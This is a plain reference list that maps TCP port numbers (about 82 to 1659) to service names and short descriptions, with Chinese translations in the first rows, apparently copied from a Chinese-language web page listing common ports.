82 xfer XFER Utility 传输实用程序
83 mit-ml-dev MIT ML Device 模块化智能终端ML设备
84 ctf Common Trace Facility 公用追踪设备
85 mit-ml-dev MIT ML Device 模块化智能终端ML设备
86 mfcobol Micro Focus Cobol Micro Focus Cobol编程语言
87 ? any private terminal link 预留给个人终端连接
88 kerberos Kerberos Kerberros安全认证系统
89 su-mit-tg SU/MIT Telnet Gateway SU/MIT终端仿真网关
90 dnsix DNSIX Securit Attribute Token Map DNSIX 安全属性标记图
91 mit-dov MIT Dover Spooler MIT Dover假脱机
92 npp Network Printing Protocol 网络打印协议
93 dcp Device Control Protocol 设备控制协议
94 objcall Tivoli Object Dispatcher Tivoli对象调度
95 supdup SUPDUP
96 dixie DIXIE Protocol Specification DIXIE协议规范
97 swift-rvf Swift Remote Virtural File Protocol 快速远程虚拟文件协议
98 tacnews TAC News TAC(东京大学自动计算机?)新闻协议
99 metagram Metagram Relay
101/tcp hostname NIC Host Name Server
102/tcp iso-tsap ISO-TSAP Class 0
103/tcp gppitnp Genesis Point-to-Point Trans Net
104/tcp acr-nema ACR-NEMA Digital Imag. & Comm. 300
105/tcp cso CCSO name server protocol
105/tcp csnet-ns Mailbox Name Nameserver
106/tcp 3com-tsmux 3COM-TSMUX
107/tcp rtelnet Remote Telnet Service
108/tcp snagas SNA Gateway Access Server
109/tcp pop2 Post Office Protocol - Version 2
110/tcp pop3 Post Office Protocol - Version 3
111/tcp sunrpc SUN Remote Procedure Call
112/tcp mcidas McIDAS Data Transmission Protocol
113/tcp ident
114/tcp audionews Audio News Multicast
115/tcp sftp Simple File Transfer Protocol
116/tcp ansanotify ANSA REX Notify
117/tcp uucp-path UUCP Path Service
118/tcp sqlserv SQL Services
119/tcp nntp Network News Transfer Protocol
120/tcp cfdptkt CFDPTKT
121/tcp erpc Encore Expedited Remote Pro.Call
122/tcp smakynet SMAKYNET
123/tcp ntp Network Time Protocol
124/tcp ansatrader ANSA REX Trader
125/tcp locus-map Locus PC-Interface Net Map Ser
126/tcp unitary Unisys Unitary Login
127/tcp locus-con Locus PC-Interface Conn Server
128/tcp gss-xlicen GSS X License Verification
129/tcp pwdgen Password Generator Protocol
130/tcp cisco-fna cisco FNATIVE
131/tcp cisco-tna cisco TNATIVE
132/tcp cisco-sys cisco SYSMAINT
133/tcp statsrv Statistics Service
134/tcp ingres-net INGRES-NET Service
135/tcp epmap DCE endpoint resolution
136/tcp profile PROFILE Naming System
137/tcp netbios-ns NETBIOS Name Service
138/tcp netbios-dgm NETBIOS Datagram Service
139/tcp netbios-ssn NETBIOS Session Service
140/tcp emfis-data EMFIS Data Service
141/tcp emfis-cntl EMFIS Control Service
142/tcp bl-idm Britton-Lee IDM
143/tcp imap Internet Message Access Protocol
144/tcp uma Universal Management Architecture
145/tcp uaac UAAC Protocol
146/tcp iso-tp0 ISO-IP0
147/tcp iso-ip ISO-IP
148/tcp jargon Jargon
149/tcp aed-512 AED 512 Emulation Service
150/tcp sql-net SQL-NET
151/tcp hems HEMS
152/tcp bftp Background File Transfer Program
153/tcp sgmp SGMP
154/tcp netsc-prod NETSC
155/tcp netsc-dev NETSC
156/tcp sqlsrv SQL Service
157/tcp knet-cmp KNET/VM Command/Message Protocol
158/tcp pcmail-srv PCMail Server
159/tcp nss-routing NSS-Routing
160/tcp sgmp-traps SGMP-TRAPS
161/tcp snmp SNMP
162/tcp snmptrap SNMPTRAP
163/tcp cmip-man CMIP/TCP Manager
164/tcp cmip-agent CMIP/TCP Agent
165/tcp xns-courier Xerox
166/tcp s-net Sirius Systems
167/tcp namp NAMP
168/tcp rsvd RSVD
169/tcp send SEND
170/tcp print-srv Network PostScript
171/tcp multiplex Network Innovations Multiplex
172/tcp cl/1 Network Innovations CL/1
173/tcp xyplex-mux Xyplex
174/tcp mailq MAILQ
175/tcp vmnet VMNET
176/tcp genrad-mux GENRAD-MUX
177/tcp xdmcp X Display Manager Control Protocol
178/tcp nextstep NextStep Window Server
179/tcp bgp Border Gateway Protocol
180/tcp ris Intergraph
181/tcp unify Unify
182/tcp audit Unisys Audit SITP
183/tcp ocbinder OCBinder
184/tcp ocserver OCServer
185/tcp remote-kis Remote-KIS
186/tcp kis KIS Protocol
187/tcp aci Application Communication Interface
188/tcp mumps Plus Five‘s MUMPS
189/tcp qft Queued File Transport
190/tcp gacp Gateway Access Control Protocol
191/tcp prospero Prospero Directory Service
192/tcp osu-nms OSU Network Monitoring System
193/tcp srmp Spider Remote Monitoring Protocol
194/tcp irc Internet Relay Chat Protocol
195/tcp dn6-nlm-aud DNSIX Network Level Module Audit
196/tcp dn6-smm-red DNSIX Session Mgt Module Audit Redir
197/tcp dls Directory Location Service
198/tcp dls-mon Directory Location Service Monitor
199/tcp smux SMUX
200/tcp src IBM System Resource Controller
201/tcp at-rtmp AppleTalk Routing Maintenance
202/tcp at-nbp AppleTalk Name Binding
203/tcp at-3 AppleTalk Unused
204/tcp at-echo AppleTalk Echo
205/tcp at-5 AppleTalk Unused
206/tcp at-zis AppleTalk Zone Information
207/tcp at-7 AppleTalk Unused
208/tcp at-8 AppleTalk Unused
209/tcp qmtp The Quick Mail Transfer Protocol
210/tcp z39.50 ANSI Z39.50
211/tcp 914c/g Texas Instruments 914C/G Terminal
212/tcp anet ATEXSSTR
214/tcp vmpwscs VM PWSCS
215/tcp softpc Insignia Solutions
216/tcp CAIlic Computer Associates Int‘l License Server
217/tcp dbase dBASE Unix
218/tcp mpp Netix Message Posting Protocol
219/tcp uarps Unisys ARPs
220/tcp imap3 Interactive Mail Access Protocol v3
221/tcp fln-spx Berkeley rlogind with SPX auth
222/tcp rsh-spx Berkeley rshd with SPX auth
223/tcp cdc Certificate Distribution Center
242/tcp direct Direct
243/tcp sur-meas Survey Measurement
244/tcp dayna Dayna
245/tcp link LINK
246/tcp dsp3270 Display Systems Protocol
247/tcp subntbcst_tftp SUBNTBCST_TFTP
248/tcp bhfhs bhfhs
256/tcp rap RAP
257/tcp set Secure Electronic Transaction
258/tcp yak-chat Yak Winsock Personal Chat
259/tcp esro-gen Efficient Short Remote Operations
260/tcp openport Openport
263/tcp hdap HDAP
264/tcp bgmp BGMP
280/tcp http-mgmt http-mgmt
309/tcp entrusttime EntrustTime
310/tcp bhmds bhmds
312/tcp vslmp VSLMP
315/tcp dpsi DPSI
316/tcp decauth decAuth
317/tcp zannet Zannet
321/tcp pip PIP
344/tcp pdap Prospero Data Access Protocol
345/tcp pawserv Perf Analysis Workbench
346/tcp zserv Zebra server
347/tcp fatserv Fatmen Server
348/tcp csi-sgwp Cabletron Management Protocol
349/tcp mftp mftp
351/tcp matip-type-b MATIP Type B
351/tcp bhoetty bhoetty (added 5/21/97)
353/tcp ndsauth NDSAUTH
354/tcp bh611 bh611
357/tcp bhevent bhevent
362/tcp srssend SRS Send
365/tcp dtk DTK
366/tcp odmr ODMR
368/tcp qbikgdp QbikGDP
371/tcp clearcase Clearcase
372/tcp ulistproc ListProcessor
373/tcp legent-1 Legent Corporation
374/tcp legent-2
374/tcp legent-2 Legent Corporation
375/tcp hassle Hassle
376/tcp nip Amiga Envoy Network Inquiry Proto
377/tcp tnETOS NEC Corporation
378/tcp dsETOS NEC Corporation
379/tcp is99c TIA/EIA/IS-99 modem client
380/tcp is99s TIA/EIA/IS-99 modem server
381/tcp hp-collector hp performance data collector
383/tcp hp-alarm-mgr hp performance data alarm manager
384/tcp arns A Remote Network Server System
385/tcp ibm-app IBM Application
386/tcp asa ASA Message Router Object Def.
387/tcp aurp Appletalk Update-Based Routing Pro.
388/tcp unidata-ldm Unidata LDM Version 4
389/tcp ldap Lightweight Directory Access Protocol
390/tcp uis UIS
391/tcp synotics-relay SynOptics SNMP Relay Port
393/tcp dis Data Interpretation System
394/tcp embl-ndt EMBL Nucleic Data Transfer
395/tcp netcp NETscout Control Protocol
396/tcp netware-ip Novell Netware over IP
397/tcp mptn Multi Protocol Trans. Net.
398/tcp kryptolan Kryptolan
399/tcp iso-tsap-c2 ISO Transport Class 2 Non-Control over TCP
400/tcp work-sol Workstation Solutions
401/tcp ups Uninterruptible Power Supply
402/tcp genie Genie Protocol
403/tcp decap decap
404/tcp nced nced
405/tcp ncld ncld
406/tcp imsp Interactive Mail Support Protocol
407/tcp timbuktu Timbuktu
408/tcp prm-sm Prospero Resource Manager Sys. Man.
409/tcp prm-nm Prospero Resource Manager Node Man.
410/tcp decladebug DECLadebug Remote Debug Protocol
411/tcp rmt Remote MT Protocol
412/tcp synoptics-trap Trap Convention Port
413/tcp smsp SMSP
414/tcp infoseek InfoSeek
415/tcp bnet BNet
416/tcp silverplatter Silverplatter
417/tcp onmux Onmux
418/tcp hyper-g Hyper-G
419/tcp ariel1 Ariel
420/tcp smpte SMPTE
421/tcp ariel2 Ariel
422/tcp ariel3 Ariel
423/tcp opc-job-start IBM Operations Planning and Control Start
424/tcp opc-job-track IBM Operations Planning and Control Track
425/tcp icad-el ICAD
426/tcp smartsdp smartsdp
427/tcp svrloc Server Location
428/tcp ocs_cmu OCS_CMU
429/tcp ocs_amu OCS_AMU
430/tcp utmpsd UTMPSD
431/tcp utmpcd UTMPCD
432/tcp iasd IASD
433/tcp nnsp NNSP
434/tcp mobileip-agent MobileIP-Agent
435/tcp mobilip-mn MobilIP-MN
436/tcp dna-cml DNA-CML
437/tcp comscm comscm
438/tcp dsfgw dsfgw
439/tcp dasp dasp Thomas Obermair
440/tcp sgcp sgcp
441/tcp decvms-sysmgt decvms-sysmgt
442/tcp cvc_hostd cvc_hostd
443/tcp https http protocol over TLS/SSL
444/tcp snpp Simple Network Paging Protocol
445/tcp microsoft-ds Microsoft-DS
446/tcp ddm-rdb DDM-RDB
447/tcp ddm-dfm DDM-RFM
448/tcp ddm-ssl DDM-SSL
449/tcp as-servermap AS Server Mapper
450/tcp tserver TServer
451/tcp sfs-smp-net Cray Network Semaphore server
453/tcp creativeserver CreativeServer
454/tcp contentserver ContentServer
455/tcp creativepartnr CreativePartnr
456/tcp macon-tcp macon-tcp
457/tcp scohelp scohelp
458/tcp appleqtc apple quick time
459/tcp ampr-rcmd ampr-rcmd
460/tcp skronk skronk
461/tcp datasurfsrv DataRampSrv
462/tcp datasurfsrvsec DataRampSrvSec
463/tcp alpes alpes
464/tcp kpasswd kpasswd
465/tcp smtps smtp protocol over TLS/SSL (was ssmtp)
466/tcp digital-vrc digital-vrc
467/tcp mylex-mapd mylex-mapd
468/tcp photuris proturis
469/tcp rcp Radio Control Protocol
470/tcp scx-proxy scx-proxy
471/tcp mondex Mondex
472/tcp ljk-login ljk-login
473/tcp hybrid-pop hybrid-pop
474/tcp tn-tl-w1 tn-tl-w1
475/tcp tcpnethaspsrv tcpnethaspsrv
476/tcp tn-tl-fd1 tn-tl-fd1
477/tcp ss7ns ss7ns
478/tcp spsc spsc
479/tcp iafserver iafserver
480/tcp iafdbase iafdbase
481/tcp ph Ph service
482/tcp bgs-nsi bgs-nsi
483/tcp ulpnet ulpnet
484/tcp integra-sme Integra Software Management Environment
485/tcp powerburst Air Soft Power Burst
486/tcp avian avian
487/tcp saft saft Simple Asynchronous File Transfer
488/tcp gss-http gss-http
489/tcp nest-protocol nest-protocol
490/tcp micom-pfs micom-pfs
491/tcp go-login go-login
492/tcp ticf-1 Transport Independent Convergence for FNA
493/tcp ticf-2 Transport Independent Convergence for FNA
494/tcp pov-ray POV-Ray
495/tcp intecourier intecourier
496/tcp pim-rp-disc PIM-RP-DISC
497/tcp dantz dantz
498/tcp siam siam
499/tcp iso-ill ISO ILL Protocol
500/tcp isakmp isakmp
501/tcp stmf STMF
502/tcp asa-appl-proto asa-appl-proto
503/tcp intrinsa Intrinsa
504/tcp citadel citadel
505/tcp mailbox-lm mailbox-lm
506/tcp ohimsrv ohimsrv
507/tcp crs crs
508/tcp xvttp xvttp
509/tcp snare snare
510/tcp fcp FirstClass Protocol
511/tcp passgo PassGo
512/tcp exec remote process execution;
513/tcp login remote login a la telnet;
514/tcp shell cmd
515/tcp printer spooler
516/tcp videotex videotex
517/tcp talk like tenex link, but across
518/tcp ntalk
519/tcp utime unixtime
520/tcp efs extended file name server
521/tcp ripng ripng
522/tcp ulp ULP
523/tcp ibm-db2 IBM-DB2
524/tcp ncp NCP
525/tcp timed timeserver
526/tcp tempo newdate
527/tcp stx Stock IXChange
528/tcp custix Customer IXChange
529/tcp irc-serv IRC-SERV
530/tcp courier rpc
531/tcp conference chat
532/tcp netnews readnews
533/tcp netwall for emergency broadcasts
534/tcp mm-admin MegaMedia Admin
535/tcp iiop iiop
536/tcp opalis-rdv opalis-rdv
537/tcp nmsp Networked Media Streaming Protocol
538/tcp gdomap gdomap
539/tcp apertus-ldp Apertus Technologies Load Determination
540/tcp uucp uucpd
541/tcp uucp-rlogin uucp-rlogin
542/tcp commerce commerce
543/tcp klogin
544/tcp kshell krcmd
545/tcp appleqtcsrvr appleqtcsrvr
546/tcp dhcpv6-client DHCPv6 Client
547/tcp dhcpv6-server DHCPv6 Server
548/tcp afpovertcp AFP over TCP
549/tcp idfp IDFP
550/tcp new-rwho new-who
551/tcp cybercash cybercash
552/tcp deviceshare deviceshare
553/tcp pirp pirp
554/tcp rtsp Real Time Stream Control Protocol
555/tcp dsf
556/tcp remotefs rfs server
557/tcp openvms-sysipc openvms-sysipc
558/tcp sdnskmp SDNSKMP
559/tcp teedtap TEEDTAP
560/tcp rmonitor rmonitord
561/tcp monitor
562/tcp chshell chcmd
563/tcp nntps nntp protocol over TLS/SSL (was snntp)
564/tcp 9pfs plan 9 file service
565/tcp whoami whoami
566/tcp streettalk streettalk
567/tcp banyan-rpc banyan-rpc
568/tcp ms-shuttle microsoft shuttle
569/tcp ms-rome microsoft rome
570/tcp meter demon
571/tcp meter udemon
572/tcp sonar sonar
573/tcp banyan-vip banyan-vip
574/tcp ftp-agent FTP Software Agent System
575/tcp vemmi VEMMI
576/tcp ipcd ipcd
577/tcp vnas vnas
578/tcp ipdd ipdd
579/tcp decbsrv decbsrv
581/tcp bdp Bundle Discovery Protocol
588/tcp cal CAL
589/tcp eyelink EyeLink
590/tcp tns-cml TNS CML
593/tcp http-rpc-epmap HTTP RPC Ep Map
594/tcp tpip TPIP
596/tcp smsd SMSD
599/tcp acp Aeolon Core Protocol
600/tcp ipcserver Sun IPC server
606/tcp urm Cray Unified Resource Manager
607/tcp nqs nqs
608/tcp sift-uft Sender-Initiated/Unsolicited File Transfer
609/tcp npmp-trap npmp-trap
610/tcp npmp-local npmp-local
611/tcp npmp-gui npmp-gui
613/tcp hmmp-op HMMP Operation
620/tcp sco-websrvrmgr SCO WebServer Manager
621/tcp escp-ip ESCP
625/tcp dec_dlm DEC DLM
626/tcp asia ASIA
628/tcp qmqp QMQP
630/tcp rda RDA
631/tcp ipp IPP (Internet Printing Protocol)
632/tcp bmpp bmpp
634/tcp ginad ginad
635/tcp rlzdbase RLZ DBase
636/tcp ldaps ldap protocol over TLS/SSL (was sldap)
637/tcp lanserver lanserver
639/tcp msdp MSDP
666/tcp doom doom Id Software
667/tcp disclose campaign contribution disclosures - SDR Technologies
668/tcp mecomm MeComm
669/tcp meregister MeRegister
670/tcp vacdsm-sws VACDSM-SWS
671/tcp vacdsm-app VACDSM-APP
672/tcp vpps-qua VPPS-QUA
673/tcp cimplex CIMPLEX
674/tcp acap ACAP
675/tcp dctp DCTP
704/tcp elcsd errlog copy/server daemon
705/tcp agentx AgentX
709/tcp entrust-kmsh Entrust Key Management Service Handler
710/tcp entrust-ash Entrust Administration Service Handler
729/tcp netviewdm1 IBM NetView DM/6000 Server/Client
730/tcp netviewdm2 IBM NetView DM/6000 send/tcp
731/tcp netviewdm3 IBM NetView DM/6000 receive/tcp
741/tcp netgw netGW
742/tcp netrcs Network based Rev. Cont. Sys.
744/tcp flexlm Flexible License Manager
747/tcp fujitsu-dev Fujitsu Device Control
748/tcp ris-cm Russell Info Sci Calendar Manager
749/tcp kerberos-adm kerberos administration
750/tcp rfile
751/tcp pump
752/tcp qrh
753/tcp rrh
754/tcp tell send
758/tcp nlogin
759/tcp con
760/tcp ns
761/tcp rxe
762/tcp quotad
763/tcp cycleserv
764/tcp omserv
765/tcp webster
769/tcp vid
770/tcp cadlock
771/tcp rtip
772/tcp cycleserv2
773/tcp submit
774/tcp rpasswd
776/tcp wpages
780/tcp wpgs
786/tcp concert Concert
787/tcp qsc QSC
801/tcp device
873/tcp rsync rsync
886/tcp iclcnet-locate ICL coNETion locate server
887/tcp iclcnet_svinfo ICL coNETion server info
888/tcp accessbuilder AccessBuilder
900/tcp omginitialrefs OMG Initial Refs
911/tcp xact-backup xact-backup
990/tcp ftps ftp protocol, control, over TLS/SSL
991/tcp nas Netnews Administration System
992/tcp telnets telnet protocol over TLS/SSL
993/tcp imaps imap4 protocol over TLS/SSL
994/tcp ircs irc protocol over TLS/SSL
995/tcp pop3s pop3 protocol over TLS/SSL (was spop3)
996/tcp vsinet vsinet
997/tcp maitrd
998/tcp busboy
999/tcp garcon 1000/tcp cadlock
1010/tcp surf surf
1023/tcp Reserved Reserved
1030/tcp iad1 BBN IAD
1031/tcp iad2 BBN IAD
1032/tcp iad3 BBN IAD
1047/tcp neod1 Sun‘s NEO Object Request Broker
1048/tcp neod2 Sun‘s NEO Object Request Broker
1058/tcp nim nim
1059/tcp nimreg nimreg
1067/tcp instl_boots Installation Bootstrap Proto. Serv.
1068/tcp instl_bootc Installation Bootstrap Proto. Cli.
1080/tcp socks Socks
1083/tcp ansoft-lm-1 Anasoft License Manager
1084/tcp ansoft-lm-2 Anasoft License Manager
1123/tcp murray Murray
1155/tcp nfa Network File Access
1212/tcp lupa lupa
1222/tcp nerv SNI R&D network
1239/tcp nmsd NMSD
1248/tcp hermes
1313/tcp bmc_patroldb BMC_PATROLDB
1314/tcp pdps Photoscript Distributed Printing System
1321/tcp pip PIP
1345/tcp vpjp VPJP
1346/tcp alta-ana-lm Alta Analytics License Manager
1347/tcp bbn-mmc multi media conferencing
1348/tcp bbn-mmx multi media conferencing
1349/tcp sbook Registration Network Protocol
1350/tcp editbench Registration Network Protocol
1352/tcp lotusnote Lotus Note
1353/tcp relief Relief Consulting
1354/tcp rightbrain RightBrain Software
1355/tcp intuitive-edge Intuitive Edge
1356/tcp cuillamartin CuillaMartin Company
1357/tcp pegboard Electronic PegBoard
1358/tcp connlcli CONNLCLI
1359/tcp ftsrv FTSRV
1360/tcp mimer MIMER
1361/tcp linx LinX
1362/tcp timeflies TimeFlies
1363/tcp ndm-requester Network DataMover Requester
1364/tcp ndm-server Network DataMover Server
1365/tcp adapt-sna Network Software Associates
1366/tcp netware-csp Novell NetWare Comm Service Platform
1367/tcp dcs DCS
1368/tcp screencast ScreenCast
1369/tcp gv-us GlobalView to Unix Shell
1370/tcp us-gv Unix Shell to GlobalView
1371/tcp fc-cli Fujitsu Config Protocol
1372/tcp fc-ser Fujitsu Config Protocol
1373/tcp chromagrafx Chromagrafx
1374/tcp molly EPI Software Systems
1375/tcp bytex Bytex
1376/tcp ibm-pps IBM Person to Person Software
1377/tcp cichlid Cichlid License Manager
1378/tcp elan Elan License Manager
1379/tcp dbreporter Integrity Solutions
1380/tcp telesis-licman Telesis Network License Manager
1381/tcp apple-licman Apple Network License Manager
1382/tcp udt_os
1383/tcp gwha GW Hannaway Network License Manager
1384/tcp os-licman Objective Solutions License Manager
1385/tcp atex_elmd Atex Publishing License Manager
1386/tcp checksum CheckSum License Manager
1387/tcp cadsi-lm Computer Aided Design Software Inc LM
1388/tcp objective-dbc Objective Solutions DataBase Cache
1389/tcp iclpv-dm document.nbspManager
1390/tcp iclpv-sc Storage Controller
1391/tcp iclpv-sas Storage Access Server
1392/tcp iclpv-pm Print Manager
1393/tcp iclpv-nls Network Log Server
1394/tcp iclpv-nlc Network Log Client
1395/tcp iclpv-wsm PC Workstation Manager software
1396/tcp dvl-activemail DVL Active Mail
1399/tcp cadkey-licman Cadkey License Manager
常见端口说明:
1400/tcp cadkey-tablet Cadkey Tablet Daemon
1402/tcp prm-sm-np Prospero Resource Manager
1403/tcp prm-nm-np Prospero Resource Manager
1404/tcp igi-lm Infinite Graphics License Manager
1405/tcp ibm-res IBM Remote Execution Starter
1406/tcp netlabs-lm NetLabs License Manager
1407/tcp dbsa-lm DBSA License Manager
1408/tcp sophia-lm Sophia License Manager
1409/tcp here-lm Here License Manager
1410/tcp hiq HiQ License Manager
1411/tcp af AudioFile
1412/tcp innosys InnoSys
1413/tcp innosys-acl Innosys-ACL
1414/tcp ibm-mqseries IBM MQSeries
1415/tcp dbstar DBStar
1416/tcp novell-lu6.2 Novell LU6.2
1417/tcp timbuktu-srv1 Timbuktu Service 1 Port
1418/tcp timbuktu-srv2 Timbuktu Service 2 Port
1419/tcp timbuktu-srv3 Timbuktu Service 3 Port
1420/tcp timbuktu-srv4 Timbuktu Service 4 Port
1421/tcp gandalf-lm Gandalf License Manager
1422/tcp autodesk-lm Autodesk License Manager
1423/tcp essbase Essbase Arbor Software
1424/tcp hybrid Hybrid Encryption Protocol
1425/tcp zion-lm Zion Software License Manager
1426/tcp sais Satellite-data Acquisition System 1
1427/tcp mloadd mloadd monitoring tool
1428/tcp informatik-lm Informatik License Manager
1429/tcp nms Hypercom NMS
1430/tcp tpdu Hypercom TPDU
1431/tcp rgtp Reverse Gossip Transport
1432/tcp blueberry-lm Blueberry Software License Manager
1433/tcp ms-sql-s Microsoft-SQL-Server
1434/tcp ms-sql-m Microsoft-SQL-Monitor
1435/tcp ibm-cics IBM CICS
1436/tcp saism Satellite-data Acquisition System 2
1437/tcp tabula Tabula
1438/tcp eicon-server Eicon Security Agent/Server
1439/tcp eicon-x25 Eicon X25/SNA Gateway
1440/tcp eicon-slp Eicon Service Location Protocol
1441/tcp cadis-1 Cadis License Management
1442/tcp cadis-2 Cadis License Management
1443/tcp ies-lm Integrated Engineering Software
1444/tcp marcam-lm Marcam License Management
1445/tcp proxima-lm Proxima License Manager
1446/tcp ora-lm Optical Research Associates License Manager
1447/tcp apri-lm Applied Parallel Research LM
1448/tcp oc-lm OpenConnect License Manager
1449/tcp peport PEport
1450/tcp dwf Tandem Distributed Workbench Facility
1451/tcp infoman IBM Information Management
1452/tcp gtegsc-lm GTE Government Systems License Man
1453/tcp genie-lm Genie License Manager
1454/tcp interhdl_elmd interHDL License Manager
1455/tcp esl-lm ESL License Manager
1456/tcp dca DCA
1457/tcp valisys-lm Valisys License Manager
1458/tcp nrcabq-lm Nichols Research Corp.
1459/tcp proshare1 Proshare Notebook Application
1460/tcp proshare2 Proshare Notebook Application
1461/tcp ibm_wrless_lan IBM Wireless LAN
1462/tcp world-lm World License Manager
1463/tcp nucleus Nucleus
1464/tcp msl_lmd MSL License Manager
1465/tcp pipes Pipes Platform
1466/tcp oceansoft-lm Ocean Software License Manager
1467/tcp csdmbase CSDMBASE
1468/tcp csdm CSDM
1469/tcp aal-lm Active Analysis Limited License Manager
1470/tcp uaiact Universal Analytics
1471/tcp csdmbase csdmbase
1472/tcp csdm csdm
1473/tcp openmath OpenMath
1474/tcp telefinder Telefinder
1475/tcp taligent-lm Taligent License Manager
1476/tcp clvm-cfg clvm-cfg
1477/tcp ms-sna-server ms-sna-server
1478/tcp ms-sna-base ms-sna-base
1479/tcp dberegister dberegister
1480/tcp pacerforum PacerForum
1481/tcp airs AIRS
1482/tcp miteksys-lm Miteksys License Manager
1483/tcp afs AFS License Manager
1484/tcp confluent Confluent License Manager
1485/tcp lansource LANSource
1486/tcp nms_topo_serv nms_topo_serv
1487/tcp localinfosrvr LocalInfoSrvr
1488/tcp docstor DocStor
1489/tcp dmdocbroker dmdocbroker
1490/tcp insitu-conf insitu-conf
1491/tcp anynetgateway anynetgateway
1492/tcp stone-design-1 stone-design-1
1493/tcp netmap_lm netmap_lm
1494/tcp ica ica
1495/tcp cvc cvc
1496/tcp liberty-lm liberty-lm
1497/tcp rfx-lm rfx-lm
1498/tcp sybase-sqlany Sybase SQL Any
1499/tcp fhc Federico Heinz Consultora
1500/tcp vlsi-lm VLSI License Manager
1501/tcp saiscm Satellite-data Acquisition System 3
1502/tcp shivadiscovery Shiva
1503/tcp imtc-mcs Databeam
1504/tcp evb-elm EVB Software Engineering License Manager
1505/tcp funkproxy Funk Software, Inc.
1506/tcp utcd Universal Time daemon (utcd)
1507/tcp symplex symplex
1508/tcp diagmond diagmond
1509/tcp robcad-lm Robcad, Ltd. License Manager
1510/tcp mvx-lm Midland Valley Exploration Ltd. Lic. Man.
1511/tcp 3l-l1 3l-l1
1512/tcp wins Microsoft‘s Windows Internet Name Service
1513/tcp fujitsu-dtc Fujitsu Systems Business of America, Inc
1514/tcp fujitsu-dtcns Fujitsu Systems Business of America, Inc
1515/tcp ifor-protocol ifor-protocol
1516/tcp vpad Virtual Places Audio data
1517/tcp vpac Virtual Places Audio control
1518/tcp vpvd Virtual Places Video data
1519/tcp vpvc Virtual Places Video control
1520/tcp atm-zip-office atm zip office
1521/tcp ncube-lm nCube License Manager
1522/tcp ricardo-lm Ricardo North America License Manager
1523/tcp cichild-lm cichild
1525/tcp orasrv oracle
1525/tcp prospero-np Prospero Directory Service non-priv
1526/tcp pdap-np Prospero Data Access Prot non-priv
1527/tcp tlisrv oracle
1528/tcp mciautoreg micautoreg
1529/tcp coauthor oracle
1530/tcp rap-service rap-service
1531/tcp rap-listen rap-listen
1532/tcp miroconnect miroconnect
1533/tcp virtual-places Virtual Places Software
1534/tcp micromuse-lm micromuse-lm
1535/tcp ampr-info ampr-info
1536/tcp ampr-inter ampr-inter
1537/tcp sdsc-lm isi-lm
1538/tcp 3ds-lm 3ds-lm
1539/tcp intellistor-lm Intellistor License Manager
1540/tcp rds rds
1541/tcp rds2 rds2
1542/tcp gridgen-elmd gridgen-elmd
1543/tcp simba-cs simba-cs
1544/tcp aspeclmd aspeclmd
1545/tcp vistium-share vistium-share
1546/tcp abbaccuray abbaccuray
1547/tcp laplink laplink
1548/tcp axon-lm Axon License Manager
1549/tcp shivahose Shiva Hose
1550/tcp 3m-image-lm Image Storage license manager 3M Company
1551/tcp hecmtl-db HECMTL-DB
1552/tcp pciarray pciarray
1553/tcp sna-cs sna-cs
1554/tcp caci-lm CACI Products Company License Manager
1555/tcp livelan livelan
1556/tcp ashwin AshWin CI Tecnologies
1557/tcp arbortext-lm ArborText License Manager
1558/tcp xingmpeg xingmpeg
1559/tcp web2host web2host
1560/tcp asci-val asci-val
1561/tcp facilityview facilityview
1562/tcp pconnectmgr pconnectmgr
1563/tcp cadabra-lm Cadabra License Manager
1564/tcp pay-per-view Pay-Per-View
1565/tcp winddlb WinDD
1566/tcp corelvideo CORELVIDEO
1567/tcp jlicelmd jlicelmd
1568/tcp tsspmap tsspmap
1569/tcp ets ets
1570/tcp orbixd orbixd
1571/tcp rdb-dbs-disp Oracle Remote Data Base
1572/tcp chip-lm Chipcom License Manager
1573/tcp itscomm-ns itscomm-ns
1574/tcp mvel-lm mvel-lm
1575/tcp oraclenames oraclenames
1576/tcp moldflow-lm moldflow-lm
1577/tcp hypercube-lm hypercube-lm
1578/tcp jacobus-lm Jacobus License Manager
1579/tcp ioc-sea-lm ioc-sea-lm
1580/tcp tn-tl-r1 tn-tl-r1
1581/tcp mil-2045-47001 MIL-2045-47001
1582/tcp msims MSIMS
1583/tcp simbaexpress simbaexpress
1584/tcp tn-tl-fd2 tn-tl-fd2
1585/tcp intv intv
1586/tcp ibm-abtact ibm-abtact
1587/tcp pra_elmd pra_elmd
1588/tcp triquest-lm triquest-lm
1589/tcp vqp VQP
1590/tcp gemini-lm gemini-lm
1591/tcp ncpm-pm ncpm-pm
1592/tcp commonspace commonspace
1593/tcp mainsoft-lm mainsoft-lm
1594/tcp sixtrak sixtrak
1595/tcp radio radio
1596/tcp radio-sm radio-sm
1597/tcp orbplus-iiop orbplus-iiop
1598/tcp picknfs picknfs
1599/tcp simbaservices simbaservices
1600/tcp issd
1601/tcp aas aas
1602/tcp inspect inspect
1603/tcp picodbc pickodbc
1604/tcp icabrowser icabrowser
1605/tcp slp Salutation Manager (Salutation Protocol)
1606/tcp slm-api Salutation Manager (SLM-API)
1607/tcp stt stt
1608/tcp smart-lm Smart Corp. License Manager
1609/tcp isysg-lm isysg-lm
1610/tcp taurus-wh taurus-wh
1611/tcp ill Inter Library Loan
1612/tcp netbill-trans NetBill Transaction Server
1613/tcp netbill-keyrep NetBill Key Repository
1614/tcp netbill-cred NetBill Credential Server
1615/tcp netbill-auth NetBill Authorization Server
1616/tcp netbill-prod NetBill Product Server
1617/tcp nimrod-agent Nimrod Inter-Agent Communication
1618/tcp skytelnet skytelnet
1619/tcp xs-openstorage xs-openstorage
1620/tcp faxportwinport faxportwinport
1621/tcp softdataphone softdataphone
1622/tcp ontime ontime
1623/tcp jaleosnd jaleosnd
1624/tcp udp-sr-port udp-sr-port
1625/tcp svs-omagent svs-omagent
1636/tcp cncp CableNet Control Protocol
1637/tcp cnap CableNet Admin Protocol
1638/tcp cnip CableNet Info Protocol
1639/tcp cert-initiator cert-initiator
1640/tcp cert-responder cert-responder
1641/tcp invision InVision
1642/tcp isis-am isis-am
1643/tcp isis-ambc isis-ambc
1645/tcp datametrics datametrics
1646/tcp sa-msg-port sa-msg-port
1647/tcp rsap rsap
1648/tcp concurrent-lm concurrent-lm
1649/tcp inspect inspect
1650/tcp nkd nkd
1651/tcp shiva_confsrvr shiva_confsrvr
1652/tcp xnmp xnmp
1653/tcp alphatech-lm alphatech-lm
1654/tcp stargatealerts stargatealerts
1655/tcp dec-mbadmin dec-mbadmin
1656/tcp dec-mbadmin-h dec-mbadmin-h
1657/tcp fujitsu-mmpdc fujitsu-mmpdc
1658/tcp sixnetudr sixnetudr
1659/tcp sg-lm Silicon Grail License Manager
